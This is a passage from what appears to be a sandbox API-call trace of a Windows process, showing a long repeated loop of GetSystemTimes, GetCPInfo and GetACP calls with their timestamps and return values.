lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.202] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.202] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.202] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.203] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.203] GetACP () returned 0x4e4 [0080.203] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.204] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.258] GetACP () returned 0x4e4 [0080.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.258] GetACP () returned 0x4e4 [0080.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.258] GetACP () returned 0x4e4 [0080.258] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.259] GetACP () returned 0x4e4 [0080.259] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.260] GetACP () returned 0x4e4 [0080.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.260] GetACP () returned 0x4e4 [0080.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.260] GetACP () returned 0x4e4 [0080.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.260] GetACP () returned 0x4e4 [0080.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.260] GetACP () returned 0x4e4 [0080.260] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.261] GetACP () returned 0x4e4 [0080.261] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.262] GetACP () returned 0x4e4 [0080.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.262] GetACP () returned 0x4e4 [0080.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.262] GetACP () returned 0x4e4 [0080.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.262] GetACP () returned 0x4e4 [0080.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.262] GetACP () returned 0x4e4 [0080.262] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.263] GetACP () returned 0x4e4 [0080.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.263] GetACP () returned 0x4e4 [0080.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.263] GetACP () returned 0x4e4 [0080.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.263] GetACP () returned 0x4e4 [0080.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.263] GetACP () returned 0x4e4 [0080.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.264] GetACP () returned 0x4e4 [0080.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.264] GetACP () returned 0x4e4 [0080.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.264] GetACP () returned 0x4e4 [0080.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.264] GetACP () returned 0x4e4 [0080.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.265] GetACP () returned 0x4e4 [0080.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.265] GetACP () returned 0x4e4 [0080.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.265] GetACP () returned 0x4e4 [0080.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.265] GetACP () returned 0x4e4 [0080.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.266] GetACP () returned 0x4e4 [0080.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.266] GetACP () returned 0x4e4 [0080.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.267] GetACP () returned 0x4e4 [0080.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.267] GetACP () returned 0x4e4 [0080.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.267] GetACP () returned 0x4e4 [0080.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.267] GetACP () returned 0x4e4 [0080.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.268] GetACP () returned 0x4e4 [0080.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.268] GetACP () returned 0x4e4 [0080.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.268] GetACP () returned 0x4e4 [0080.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.268] GetACP () returned 0x4e4 [0080.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.269] GetACP () returned 0x4e4 [0080.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.269] GetACP () returned 0x4e4 [0080.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.269] GetACP () returned 0x4e4 [0080.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.269] GetACP () returned 0x4e4 [0080.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.270] GetACP () returned 0x4e4 [0080.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.270] GetACP () returned 0x4e4 [0080.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.270] GetACP () returned 0x4e4 [0080.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.270] GetACP () returned 0x4e4 [0080.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.271] GetCPInfo (in: 